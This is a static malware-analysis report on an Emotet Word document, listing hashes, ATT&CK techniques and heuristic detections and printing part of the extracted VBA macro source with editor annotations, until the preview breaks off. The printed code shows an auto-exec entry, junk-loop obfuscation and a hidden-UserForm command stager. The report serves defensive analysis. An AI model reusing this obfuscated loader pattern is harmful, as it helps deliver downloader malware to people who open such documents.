Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 cd3718878a7ae018…

MALICIOUS

Office (OLE)

Size: 188.3 KB
Created: 2019-12-16 08:32:00
Authoring application: Microsoft Office Word
First seen: 2020-02-04
MD5: 508b70f4af4a6090253576e28f14b35b
SHA-1: 64d4e443874d9cbd003ff5453a158a0629ba821d
SHA-256: cd3718878a7ae018330455ed71c6be7543fe6a01accb30c16e92575812f32e57
Risk score: 302

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1140 Deobfuscate/Decode Files or Information

The sample contains VBA macros, specifically a Document_Open auto-exec macro, a technique commonly used by Emotet. Heuristics indicate calls to CreateObject and GetObject together with a hidden UserForm property command stager, which points to an attempt to download and execute a secondary payload. ClamAV detection explicitly names this sample as Emotet.

Heuristics (8)

  • ClamAV: Doc.Downloader.Emotet-7458423-1 · critical · CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7458423-1
  • VBA macros detected · medium · 5 related findings · OLE_VBA_MACROS
    Document contains VBA macro code.
  • VBA UserForm hidden-property command stager · critical · OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
    A VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
  • Document_Open macro · high · OLE_VBA_DOCOPEN
    Document_Open macro present.
  • CreateObject call · high · OLE_VBA_CREATEOBJ
    CreateObject call present.
  • GetObject call · high · OLE_VBA_GETOBJ
    GetObject call present.
  • VBA p-code auto-exec with execution tokens · high · OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL · info · EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body). This is the standard OOXML DrawingML namespace URI, consistent with the note above that the URL itself is not a detection.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 8109 bytes
SHA-256: e13371cb7926e0cce954e6257119a1bdb1c8a38254c6235468f7edc93492b3e3

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Kyrevpin"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Qjniafsohtzkw, 0, 0, MSForms, TextBox"
Private Sub Document_open()
      ' [editor note] Auto-exec entry point: runs when the document is opened (OLE_VBA_DOCOPEN).
      ' [editor note] The three loops below are junk code: Jqhopfvk is never assigned, so each
      ' loop runs once (0 To 0) over meaningless arithmetic on Empty variables. Only the final
      ' call at the end of the Sub does any real work.
      Dim Gpjxzqvhp
      Dim Fbppzklof
      For Jbqaevsyqnuod = Jqhopfvk To 0
         Yfoouubdlcld = xPI
         Ustzgfigymaor = CDbl(3)
         Lnmbhmgzrmf = Tan(MyeW5A)
         Exsrtcwvaowij = 4 - Bngdbmzpz
         Joscmbxkcbuj = (3 - Dwlyptxuzyd)
         Glfispbs = Xcvkzpfh
         Oxqorkivop = CDbl(6)
         Fzryxtbttwwto = Tan(Ixftqzvnivqq)
      Next
      Dim Khrcephzhfyg
      Dim Mqfybxwryui
      For Xcvhxjkoe = Jqhopfvk To 0
         Tvcnqzcrc = xPI
         Afcvqxsjwu = CDbl(3)
         Jxlyaxychy = Tan(MyeW5A)
         Fuibysrlm = 4 - Pfcsnvvv
         Ltqebbte = (3 - Cgwpvork)
         Exvwvtxe = Mclctaswx
         Hvkzjimwydksk = CDbl(6)
         Xtiieotjpzv = Tan(Uwummewblxmkk)
      Next
      Dim Ecafkuwwyx
      Dim Awmjkyoabvneh
      For Linexvvf = Jqhopfvk To 0
         Zkhuucvq = xPI
         Lsyavjyi = CDbl(3)
         Wxsulnltede = Tan(MyeW5A)
         Fkohfhssnoqpt = 4 - Inxnvbhcrmi
         Cmpwtwsqhct = (3 - Xijbesdykqg)
         Uyiwuwabpbzuv = Xblelfeytqhq
         Rvjfxcuhkhwa = CDbl(6)
         Hjhjwlbjf = Tan(Qpzogmgxi)
      Next
Hcdtgxkcthnf   ' [editor note] hands off to the loader routine; its body is not within this preview
End Sub

Attribute VB_Name = "Jsbkraxy"
Attribute VB_Base = "0{830EAA7A-1B71-4277-B4AB-3EF880367575}{DD105773-569D-4B16-B191-C6B4AFEA6D1F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Lguhsipfaag"
Function Ajueafukppsix()
      Dim Dwqunlcvs
      Dim Fqclqftqect
      For Yyvkiorife = Jqhopfvk To 0
         Ttbepqzuql = xPI
         Tqosxcdkvf = CDbl(3)
         Qrmesgampzw = Tan(MyeW5A)
         Mplthtnylqsz = 4 - Cacqnxmnxd
         Jlnuuucb = (3 - Sqomiqfaueu)
         Lmiioeyrhyfjc = Wxwxaoimcbp
         Xjqhonbhll = CDbl(6)
         Nvlsicfeoewhw = Tan(Daggyipuyi)
      Next
' [editor note] Reads the MSForms TextBox (Qjniafsohtzkw) declared via VB_Control on the
' document module Kyrevpin; the text it holds is the first fragment of the assembled string.
Glvgiorl = Kyrevpin.Qjniafsohtzkw
      Dim Rbrxawdabkv
      Dim Iemdgitxw
      For Ovufakqa = Jqhopfvk To 0
         Uzpkrrlriaonn = xPI
         Oycgqqvgni = CDbl(3)
         Xzruumjn = Tan(MyeW5A)
         Toqignvobhfvm = 4 - Ubfzsbbmpor
         Ubebereop = (3 - Hlzhywbnfg)
         Dnmurcbupw = Zcdrvgzetvsh
         Nsmemztqansw = CDbl(6)
         Nnulwehwtk = Tan(Gvqivfrxpihkk)
      Next
' [editor note] Concatenates further fragments read from the Jsbkraxy UserForm module; this is
' the hidden-property command stager flagged by OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER.
Qcxkvwdlvty = Glvgiorl + Jsbkraxy.Kioicuxkupknt + Jsbkraxy.Ecclogdoh + Jsbkraxy.Gqemglefkb
      Dim Yvalekapl
      Dim Zaaslpipywaoo
      For Vkuxvthytqz = Jqhopfvk To 0
         Uuylprti = xPI
         Dvudmjxh = CDbl(3)
         Rpqvnkfsc = Tan(MyeW5A)
         Lkgvexoy = 4 - Fujqcbqvpv
         Ykeddyfmbft = (3 - Knhhljjpvmug)
         Joxnmtymvq = Qskkzbmyrnin
         Zxcykwynvx = CDbl(6)
         Hdsyrrgqsqfl = Tan(Uguvfjjzubjx)
      Next
Ovrexuwvzbhqc = Qcxkvwdlvty + Jsbkraxy.Zdvhlzvvtqot + Jsbkraxy.Dmgujvpeglnv
      Dim Rrqrbdqma
      Dim Vjuanewyu
      For Lmxwhzacwkh = Jqhopfvk To 0
         Koturumlcgitm = xPI
         Zsaqcefdt = CDbl(3)
         Rlyaxogwpzlch = Tan(MyeW5A)
         Bigpduvucekr = 4 - Flzpudancitm
         Hnqsqjcwxeb = (3 - Rvwnxfbkommn)
         Ogxvqehmpnra = Inunshjrgvwh
         Tbdfusoq = CDbl(6)
         Lxnfgivwoj = Tan(Ryuoiwac)
      Next
' [editor note] Returns the assembled string; Muclacme is not defined within this preview.
Ajueafukppsix = Muclacme + Ovrexuwvzbhqc + Muclacme
      Dim Kffoulmvin
      Dim Kpbtitdwkknt
      For Pmmiryxnpi = Jqhopfvk To 0
         Wqmtbddgft = xPI
         Knblcarml = CDbl(3)
         Aiawqvwztlvwn = Tan(MyeW5A)
         Jkpvhvlhxdx = 4 - Pqvbptmlah
         Ititpqoblq = (3 - Qabpbcssjlkcq)
         Txfjcckyb = Imjkayizkos
         Xoucxjgdvj = CDbl(6)
         Fhftfbzm = Tan(Gjykltrjsaav)
      Next
End Function
Function H
... (truncated)